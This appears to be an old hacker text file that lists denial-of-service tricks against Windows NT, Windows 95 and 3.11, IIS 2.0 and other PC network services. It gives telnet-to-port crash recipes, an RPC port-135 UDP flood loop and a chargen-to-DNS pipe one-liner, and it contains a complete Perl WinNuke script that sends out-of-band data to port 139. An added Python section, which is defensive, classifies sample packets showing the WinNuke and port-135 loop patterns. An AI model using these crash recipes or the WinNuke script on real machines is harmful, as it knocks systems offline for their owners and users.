CRASHING MICROSOFT WINDOWS

FREEZING MICROSOFT STACKS

Microsoft TCP/IP stacks can freeze when dud (bogus) replies to DHCP lease information expire prematurely.

IIS 2.0 WWW SERVER ON WINDOWS NT

If you telnet to port 80 on an NT machine running IIS 2.0 and issue the command GET ..\.. it will crash.

THE DOT DOT BUG

The Windows NT file sharing system is vulnerable to the dot dot bug (dot dot as in ..) that is famous under Windows 95, meaning that anyone can crash the system. If someone sends a "DIR ..\" to the workstation, a STOP message appears on the screen of the Windows NT computer. Note that this applies to versions 3.50 and 3.51, for both the workstation and the server version.

CONSUMING 100% OF CPU TIME ON NT MACHINES

Telnet to port 135, send some random characters and disconnect. This will cause the rpcss.exe process to start consuming all available processor cycles.

CONSUMING 100% OF CPU TIME ON NT MACHINES II

Telnet to port 6558 and type in one letter and hit enter.

CONSUMING 100% OF CPU TIME ON NT MACHINES III

Telnet to port 53 and send some random characters and disconnect.

WINDOWS NT 4.0 AND THE DNS SERVICE

The Microsoft DNS service terminates when it receives a response to a DNS query that was never made.

WINDOWS NT AND LARGE FILE CACHING

If the NT system has large file caching enabled, it is easy to eat 100% of the CPU time: just transfer a large enough file from/to the server through a shared network drive.

CONSUMING 100% OF CPU TIME ON NT MACHINES - SOME MORE PORTS

Also try ports 1031 and 1040.

FLOODING A MICROSOFT NT NETWORK

Port 135 is the RPC endpoint mapper and it is used by a number of applications. The point is that if you send UDP packets to the port, it sends UDP packets back. So we can create a loop that floods the network, almost like the Unix attack XXXXXXXXXXX XXXXXXXXXXXXXX. Just send a packet from one NT machine's port 135 to another NT machine's port 135 on the same network.

TRUMPET WINSOCK V2.X AND SEVERAL OTHER SIMILAR PROGRAMS

Several (most?) programs like Trumpet Winsock under Windows 3.11 cannot handle large ping packets. Also have a look at section xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

SENDING OOB OUT OF BAND

You can cause a denial of service on any Windows 95, Windows 3.11 (with the Microsoft TCP/IP stack) or Windows NT machine running NetBIOS by sending Out Of Band data to an established connection with the Windows machine (send it to the NetBIOS port, 139).

The NT machine will try to reboot, but this consumes all the memory, both physical and virtual. Only a proper shutdown and restart fixes the problem.

You can use the following Perl script to test the hole.

#!/usr/bin/perl
# Ghent - ghent@bounty-hunters.com - Perl version of winnuke.c by _eci

use strict;
use Socket;

my ($h, $p, $in_addr, $proto, $addr);

# First argument is the host; second is the port, default 139 (NetBIOS session)
$h = $ARGV[0];
$p = $ARGV[1] || 139;

if (!$h) { die "A hostname must be provided. Ex: www.microsoft.com\n"; }

$in_addr = (gethostbyname($h))[4] or die "Cannot resolve $h\n";
$addr    = sockaddr_in($p, $in_addr);
$proto   = getprotobyname('tcp');
socket(S, AF_INET, SOCK_STREAM, $proto) or die $!;

connect(S, $addr) or die $!;
select S; $| = 1; select STDOUT;   # unbuffer the socket handle

print "Nuking: $h:$p\n";
send S, "Sucker", MSG_OOB;         # the out-of-band (TCP urgent) data
print "Nuked!\n";
close S;


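A small packet classifier for the two traffic patterns described in the OOB section and the flooding section, added here as an example that is not part of the original text: it parses raw IPv4 packets and flags TCP segments with the URG flag set towards port 139 (WinNuke-style) and UDP datagrams going from port 135 to port 135 (the endpoint-mapper loop). The sample packets are constructed inline; the builder functions exist only to produce them.

```python
import struct

# Constructed sample data (not captures from the original page): minimal IPv4/TCP/UDP builders.
def build_ipv4(proto, src, dst, payload):
    """Minimal 20-byte IPv4 header; checksum left zero since only parsing is exercised."""
    total = 20 + len(payload)
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total, 0, 0, 64, proto, 0,
                      bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    return hdr + payload

def build_tcp(sport, dport, flags, data=b""):
    # Data offset 5 (20-byte header); flags live in the low bits of the same 16-bit field.
    return struct.pack("!HHIIHHHH", sport, dport, 0, 0, (5 << 12) | flags, 8192, 0, 0) + data

def build_udp(sport, dport, data=b""):
    return struct.pack("!HHHH", sport, dport, 8 + len(data), 0) + data

TCP_URG = 0x20

def classify(packet):
    """Return a list of alert strings for one raw IPv4 packet (empty if nothing suspicious)."""
    alerts = []
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return alerts
    ihl = (packet[0] & 0x0F) * 4
    proto = packet[9]
    src = ".".join(map(str, packet[12:16]))
    dst = ".".join(map(str, packet[16:20]))
    l4 = packet[ihl:]
    if proto == 6 and len(l4) >= 20:                      # TCP
        sport, dport, _, _, off_flags = struct.unpack("!HHIIH", l4[:14])
        if off_flags & TCP_URG and dport == 139:
            alerts.append(f"WinNuke-style OOB/URG to NetBIOS: {src}:{sport} -> {dst}:{dport}")
    elif proto == 17 and len(l4) >= 8:                    # UDP
        sport, dport = struct.unpack("!HH", l4[:4])
        if sport == 135 and dport == 135:
            alerts.append(f"RPC endpoint-mapper UDP loop: {src}:{sport} -> {dst}:{dport}")
    return alerts

SAMPLES = [
    build_ipv4(6, "10.0.0.5", "10.0.0.9", build_tcp(40000, 139, TCP_URG | 0x18, b"Sucker")),
    build_ipv4(6, "10.0.0.5", "10.0.0.9", build_tcp(40001, 139, 0x18, b"normal")),
    build_ipv4(17, "10.0.0.5", "10.0.0.9", build_udp(135, 135, b"x")),
    build_ipv4(17, "10.0.0.5", "10.0.0.9", build_udp(1024, 135, b"x")),
]

def scan(packets=SAMPLES):
    """Run the classifier over a packet list and collect all alerts."""
    return [a for p in packets for a in classify(p)]
```

Only the first and third sample packets produce alerts; the plain PSH/ACK segment to 139 and the UDP datagram from an ephemeral port are left alone.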
KILLING THE NT 4.0 NAME SERVER

Just:

$ telnet ntbox 19 | telnet ntbox 53

WEB-SERVERS FOR PC

Some configurations of some Web servers for PC are known to crash if you, in a W3 client, enter the IP number of the machine running the server.